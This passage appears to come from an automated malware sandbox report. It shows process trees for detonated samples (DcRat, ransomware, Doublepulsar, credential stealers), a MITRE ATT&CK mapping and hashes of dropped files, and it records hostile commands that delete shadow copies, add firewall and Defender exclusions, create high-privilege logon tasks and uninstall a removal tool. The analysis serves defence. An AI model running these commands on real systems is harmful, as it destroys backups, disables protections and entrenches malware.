      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:2804
  - - C:\Users\Admin\Desktop\5.exe
      "C:\Users\Admin\Desktop\5.exe"
      4⤵
      Executes dropped EXE
      Modifies registry class
      PID:3148
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:5604
      - C:\PROGRA~3\system.exe
        
        C:\PROGRA~3\system.exe
        6⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:6000
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE
        7⤵
        Modifies Windows Firewall
        
        PID:1624
  - - C:\Users\Admin\Desktop\6.exe
      "C:\Users\Admin\Desktop\6.exe"
      4⤵
      UAC bypass
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      System policy modification
      PID:1012
    - - C:\Users\Admin\Desktop\6.exe
        
        "C:\Users\Admin\Desktop\6.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:320
  - - C:\Users\Admin\Desktop\7.exe
      "C:\Users\Admin\Desktop\7.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5024
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
        5⤵
        Accesses Microsoft Outlook accounts
        
        PID:2208
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5000
  - - C:\Users\Admin\Desktop\8.exe
      "C:\Users\Admin\Desktop\8.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Sets desktop wallpaper using registry
      Suspicious behavior: EnumeratesProcesses
      PID:4840
    - - C:\Windows\system32\wbem\wmic.exe
        
        "C:\lv\ka\ile\..\..\..\Windows\lru\lftr\..\..\system32\g\..\wbem\fbedf\dn\ruh\..\..\..\wmic.exe" shadowcopy delete
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6868
  - - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""
      4⤵
      PID:1612
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
    "ska2pwej.aeh.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2740
  - - C:\Users\Admin\AppData\Local\Temp\is-1KK2H.tmp\ska2pwej.aeh.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-1KK2H.tmp\ska2pwej.aeh.tmp" /SL5="$7020A,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"
      4⤵
      Executes dropped EXE
      PID:2976
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
    "x2s443bc.cs1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:5064
  - - C:\Users\Admin\AppData\Local\Temp\is-8NJ5S.tmp\x2s443bc.cs1.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-8NJ5S.tmp\x2s443bc.cs1.tmp" /SL5="$15005E,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"
      4⤵
      Executes dropped EXE
      PID:4208

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4612

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:952

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\System32\microsoft-windows-power-cad-events\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "x2s443bc.cs1.tmp" /sc ONLOGON /tr "'C:\PerfLogs\x2s443bc.cs1.tmp.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\1033\msedge.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bot" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\bot.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5280

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004CC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5308

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\CfgSPPolicy\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\rdrleakdiag\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5832 -ip 5832
1⤵
PID:4800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4788 -ip 4788
1⤵
PID:5916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6084 -ip 6084
1⤵
PID:4396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6596 -ip 6596
1⤵
PID:6412

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
1⤵
- Drops startup file
PID:1108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6212 -ip 6212
1⤵
PID:6484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5504

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5680

C:\ProgramData\Chrome\CNSWA.exe
C:\ProgramData\Chrome\CNSWA.exe
1⤵
PID:2328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6972 -ip 6972
1⤵
PID:6500

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
PID:2872
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:2108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3552
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1432 -ip 1432
1⤵
PID:788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1960 -ip 1960
1⤵
PID:5284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Scripting

T1064

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-3852399462-405385529-394778097-1000\desktop.ini.Cyborg Builder Ransomware

Filesize
50B

MD5
5e7f31b8864daf89be5ce3ea61ed72df

SHA1
f25fea3042d87ce7b26d4319561bddfd56eec4ea

SHA256
edc8d36c2dedf83da5ca164c40b22d0299c2407133f5024c759b36e7f06dc542

SHA512
81b8a036d8b7cc943c05e97dd70f4e852aae0163a2beedd28270eb9286a73cabe6847449d73f260b2a6df25bf8d04c42ab678946473d5fcebf756b114d4525ab

Download Submit
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\1033\msedge.exe

Filesize
564KB

MD5
748a4bea8c0624a4c7a69f67263e0839

SHA1
6955b7d516df38992ac6bff9d0b0f5df150df859

SHA256
220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e

SHA512
5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

Download Submit
C:\ProgramData\system.exe

Filesize
37KB

MD5
e817d74d13c658890ff3a4c01ab44c62

SHA1
bf0b97392e7d56eee0b63dc65efff4db883cb0c7

SHA256
2945881f15e98a18d27108a29963988190853838f34faf3020e6c3c97342672d

SHA512
8d90ef308c1e0b7e01e7732e2cd819f07bfc1ef06e523efa81694ced75550c9f1be460fc9de412faeb96273a6492580402ab9c9538ed441fc26d96b6785e7815

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
88e9aaca62aa2aed293699f139d7e7e1

SHA1
09d9ccfbdff9680366291d5d1bc311b0b56a05e9

SHA256
27dcdb1cddab5d56ac53cff93489038de93f61b5504f8595b1eb2d3124bbc12c

SHA512
d90dabe34504dde422f5f6dec87851af8f4849f521759a768dfa0a38f50827b099dfde256d8f8467460c289bdb168358b2678772b8b49418c23b882ba21d4793

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
341f6b71eb8fcb1e52a749a673b2819c

SHA1
6c81b6acb3ce5f64180cb58a6aae927b882f4109

SHA256
57934852f04cef38bb4acbe4407f707f137fada0c36bab71b2cdfd58cc030a29

SHA512
57ecaa087bc5626752f89501c635a2da8404dbda89260895910a9cc31203e15095eba2e1ce9eee1481f02a43d0df77b75cb9b0d77a3bc3b894fdd1cf0f6ce6f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
08445035af0d35ca1f2494216d082f02

SHA1
8d62034dfe125a67bbb81996a756b945e7a95fb8

SHA256
f714c481774cc762470d5f100cab1ab3fb23178208db007716acf6972114f246

SHA512
8a6e1086e1a9f99dc4bd40c4d1fa77297d33482e231247bb368a053db6332ce3ca8dedc3533603b0bebc232cea3545c5f03b6ec2bfb4f63ebd6c74682f493c29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
180B

MD5
4bc8a3540a546cfe044e0ed1a0a22a95

SHA1
5387f78f1816dee5393bfca1fffe49cede5f59c1

SHA256
f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca

SHA512
e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
181681bfe0d821eabe072753864d9041

SHA1
2e99ae86f776fed2e14bfe2294fbee605312847b

SHA256
217376888d7da22795760311f80745ed57fc1c4e78e4cc5ebb26ed9c85c6b932

SHA512
bd503bb795d04713328aea3bd643c6622b18887e554504305f38738e54c6b33d08a084b47d606eb4baa918daf7b85fb99ba1d037d3cbc2d153a6bf7d1ad4a117

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ec3f60a8ccbf48d43ba58e84d97955e4

SHA1
0d1dbaf44c02f0a80cb0ed2595611f9f0905de06

SHA256
a68c0c25d29769056cb7bd3ad204cedcc7098e0e347e79cb34926dbd6ba01048

SHA512
4b106841b9febaf89f992e18be3b4351316d067e97cef3c5bb14cf1290cef11c56bf60372bc477ef90c814915db2035a06fd443f9df304baa02d31ab1092b210

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
08feddccb6c71995aee6bdd503c8db78

SHA1
131125022c40ed7d53796abfbb97715c52ab6b29

SHA256
6b7a438ec209695f1ceb9b91c796e19f818208542f01abb808f220c7e2013182

SHA512
c2c5b48d612f0165459ee05ffaf3d36fe5bb93200bad36271f54dbd0215d21e338b1d9f221da981db5b25902c548f2bf6a1a2c077ef31bf2b7c23360061aeefa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
5be562aadc170281c0b9056ec7b38c59

SHA1
9f40610a548ee004c105d335945860b5b4658ebd

SHA256
88461a7bc16a787161a6deb929e2dd4f6304d048eb68246daa170c8225fd9359

SHA512
86d3f05e30e7387c4ae47b608a75c0ca2acb692f7f1069a3690c14624f2e68db57b1547f96f830597c2be1779ada69c20c57d9d4036fb44ef8fb6aa534881363

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
8575cc91ee4594d4a5fa2bbb75a9aee6

SHA1
caca277ca929383ffb6238a10a9783ae9026f07a

SHA256
4e84e38985af269186cf1cc570e47c126de6c3636d672bf426fe35a665950c1b

SHA512
04ccb97bcfda3504b912bf7f3d7809485383cc089e7c8a787ba0b0d41f2814a9275b3668ad1f9ddb25b40bc443c049e6cce81d4c47f43eb6f31acba03c5bbc26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
5e80cdfa55976e01764e193bbf5a85fd

SHA1
2a012767e2df5d954ee692a8956232431f853108

SHA256
c689f59d084e61bf1260a5cf50ca3f478f970862c79a2a870f5338cb0345c529

SHA512
59aff910591cea59784efab8ce75fb59d96fccd3c2d3d246b46eb29287d2dcc7834f08b0b5ebc3fa936dd2d3c3d68f3a752ceb23f22a57f29ffa5dfb1e5d8414

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___53NLC9A_.txt

Filesize
1KB

MD5
67a1dda9637135f7269be090c2752bc8

SHA1
fb1dd3a48f9150b0e53974adba6b0be0f3b3b13b

SHA256
6d99a67ea678e342aab2a0b85beff924cac8e65cd60631fc1f7c317c082b0c62

SHA512
60acae4d5d2757832a84435283f56204d6209111554defd610cb33adde35829576abeba123a65de3d7881d56fd287d54f668deae816ea3f446d3295b1af655ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___KCCJB_.hta

Filesize
76KB

MD5
afc398520aab0bbbe691c4341612e026

SHA1
db1471d99400547eac414b0d516612e4edc2b84e

SHA256
129f53048e3c50594f85121eeb41ee02d63fbfdb49e485dc383a079b292cf7f1

SHA512
40ee6ba55494c3ac5df7e68cba6cb56cc520d1795720b34279a89454bfa6dcfb9ae797ac7744304a70571d6fa9213f24516c3b30285a4087f5974c16d4b039c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

Filesize
701KB

MD5
cb960c030f900b11e9025afea74f3c0c

SHA1
bbdcad9527c814a9e92cdc1ee27ae9db931eb527

SHA256
91a293c01eb7f038ddbc3a4caf8b4437da3f7d0abeef6b10d447127fac946b99

SHA512
9ca0291caa566b2cde3d4ba4634a777a884a97c471794eff544923457e331d78f01e1e4e8b893e762a33d7bdaa0f05e8a8b8e587c903e0de9bf61c069e82f554

Download Submit
C:\Users\Admin\AppData\Local\Temp\3582-490\identity_helper.exe

Filesize
995KB

MD5
69f1bb23ff827547d3b2f421b665f1b2

SHA1
36b5a00cf5795f322d429fae41afb34d4ea2ad16

SHA256
eb8ba8794da4b6191b2009d6f52e58d24e2532758a27c39356f98947ce825522

SHA512
f261d6d60b0fa3df563a990d449e3070781958321c99021313caeb72cdeddc6f7a584ebbc16d7fcd2caf5e0e609688324d2c68d13801081129625f5b43083735

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\00000000.eky

Filesize
1KB

MD5
6328ecced8e03d948f110cd06ae77c89

SHA1
b5cea62e25c52a7fa331f7dc83dd6f306ad28602

SHA256
a1b8c9b8b701ff221a503af06cdd612ebbf69249dd37ceb4992a00f5ce81a549

SHA512
29236978df9c8ce58a375e4bbb4a1a41eae0fdf54c24e32994b43142b54cf5b43c457e8a61bc071aa5a08951dc79da404bc8e91be99af7f6675742d9aa8260c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\00000000.pky

Filesize
276B

MD5
bd18afe88be7f1c0db18c572a8c3973e

SHA1
9a577e6fe20f9ab85dfbdc21fe11d733b3734c38

SHA256
62a3d6e56225ca8e9655695f179304417a87fb4d83ad65a24e098dc2fd584811

SHA512
d3f5f49a248e781e497bc5431aeee5657b00570e311856be41e9f8913a957c6221cf8daa27290356635746ba032e79891435728d151859aef4f4ec608b55c0e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\00000000.res

Filesize
136B

MD5
c943b6fe21791d51ebbdace04384d10b

SHA1
1abbea102c1e0d974d97667d5b8fdc85638e1fb4

SHA256
a1de70c712d44ea8d4d0335af4ea99d70b01a9f8d6cbd411e3bb3fd2a64b4030

SHA512
e15b4adc0f492b97eaaa467c618a76ea03e864fb478a2752c2b6a1b440b1f51a6d542ccb5fd0778b897042d3d4e93a9bcc9494bfd3b4d7f97f70d5f81e495816

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\291531712738554.bat

Filesize
356B

MD5
56bda98548d75c62da1cff4b1671655b

SHA1
90a0c4123b86ac28da829e645cb171db00cf65dc

SHA256
35e5885504a1745554c26f49a0adab2d26a532838f8e495f211572d42ea19ead

SHA512
eefeab1311ded740628cf3fed32e750266dd2daa833ab8212f8ffe548967f0bd94e48cf11c75345150885268404c0275aab56b4210fb4f21883046611a567a72

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe

Filesize
10KB

MD5
2a94f3960c58c6e70826495f76d00b85

SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

Filesize
933B

MD5
f97d2e6f8d820dbd3b66f21137de4f09

SHA1
596799b75b5d60aa9cd45646f68e9c0bd06df252

SHA256
0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

SHA512
efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

Filesize
313KB

MD5
fe1bc60a95b2c2d77cd5d232296a7fa4

SHA1
c07dfdea8da2da5bad036e7c2f5d37582e1cf684

SHA256
b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d

SHA512
266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

Filesize
1.4MB

MD5
63210f8f1dde6c40a7f3643ccf0ff313

SHA1
57edd72391d710d71bead504d44389d0462ccec9

SHA256
2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f

SHA512
87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1111.exe

Filesize
1.9MB

MD5
e9643855e72593683cbc5257b6687fc2

SHA1
6b5b7c5d605f223a8a05e0e2d2e5ec4a3f326a61

SHA256
1e11f472999240b1b8474119e7d0be5069dda02af979e27cc4c0d83a70c4c2f5

SHA512
abe73037d629e4e30acd3836008a5f59d02d1002a389e524d80929504e56fbc03581184003ebbbf325c803ea7ecab6c13dab3b000490bf7aa45efe307313a50a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Doublepulsar-1.3.1.exe

Filesize
44KB

MD5
c24315b0585b852110977dacafe6c8c1

SHA1
be855cd1bfc1e1446a3390c693f29e2a3007c04e

SHA256
15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13

SHA512
81032d741767e868ec9d01e827b1c974b7c040ff832907d0a2c4bdc08301189b1de3338225587eddf81a829103392f454ba9d9685330b5f6706ea2977a6418e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FirstZ.exe

Filesize
2.5MB

MD5
ffada57f998ed6a72b6ba2f072d2690a

SHA1
6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f

SHA256
677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12

SHA512
1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup5.exe

Filesize
451KB

MD5
c892e43d2a060548440e310d5954cee7

SHA1
4dc9ccf0dad8b40f95c900076893bdee02b32228

SHA256
8e5c41715fbe841bcf14e7dc39eae64f821d0b52721f988bcd54e2b13980e794

SHA512
5601a833cc6ca490f42e8b533cce70cbf397924f213b9c3e2c9e84254889bd7d589450f4d86471924664352540f02e3d618618469da89692589864b2813d5f56

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Ljauypuypg.exe

Filesize
717KB

MD5
d1ae1625648ef095e91496abcf952838

SHA1
993807041f53f2e254671687ae4f3444e8d313ef

SHA256
be776602edd294309c27deeca8971ecbbda0146a98ce7d29f33c449b7ca83b96

SHA512
6fad84b37020e6fb693b282ead632aedc30c7916aaeaa5369f4a30f4c6c6dd10d296aab7cc775d9b2eae3653fae2b2b0baeb9b41fa7b47bb60111f4246144356

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pgp-Soft.exe

Filesize
9.8MB

MD5
253894f951050fe1780b7d72230a997b

SHA1
94af09e5b3ebcf88ff60481a17481cc7194162e8

SHA256
80af92d4a363f01d5cfe473016d8994a700b0937e9c4c5de953637d4435c019d

SHA512
022f73c84123ababacd5c5a29697f31a1e342eba4a2344ea110773e13773bab1222d51e03188969042b43b40bc007267e8853cb19f81f37b5eaabfacb881d32f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pilgzi.exe

Filesize
1.3MB

MD5
d696acbd7f8884fa75abdbcd018a47dd

SHA1
803be74e20af32e880e6a2c4a24f6a02b0b86ee8

SHA256
03045e53a51ed7e49ac919e02f474e5a5723a62e4911f364c8c592ade608ef3d

SHA512
f8b5832270661df890fd6a8d3f7e26653eb51c7fa4b974a2fd67d498a0339c270168e6fa3e9c85a853113b41a5732ff08a10877d14a7f58c2b63ce3f20d161f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TJeAjWEEeH.exe

Filesize
892KB

MD5
d65f5542509366672c1224cc31adfbf0

SHA1
b23844901a5cec793cece737f3357f8c8793d542

SHA256
85c5a9b53be051fef06d1082abb950a731ffb452e68cc9aafa907251e2d6bd72

SHA512
c4c333f4d084a3625162ff356b70f092cdbafff806af7d2b3c0ce596769b85ee546e341bf7e917609083f7785976dcce63b7bedd2cea63200fa4807721f19f5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TrueCrypt_nKJqAu.exe

Filesize
704KB

MD5
0b90f30cff2c910e227e4f60e168f2f7

SHA1
e700fd692fd4746b7fbcb9fde44dae9add22456c

SHA256
a13cdfde4e6338525c3713f6519c6b02798370f2912d5c4ff02841bfd3d54f55

SHA512
2889856986cb73b8027c3572d682d19df0b8e6e0e613c3c7b61508bdc2f19224c8807ee5da2174c3dfa99eaa77e2e81b5aa755577cf8361aff2f72d42a6dd182

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\User%20OOBE%20Broker.exe

Filesize
16.5MB

MD5
21f57e534a0adc7765d6eeb22ec5bd74

SHA1
43baaefa89366a2ab42e1ad30fdffcebeb81d00a

SHA256
8487b7cbcc6331ce5da7a3f19229813c10801285ed30a8d82e81bf19b1ec385a

SHA512
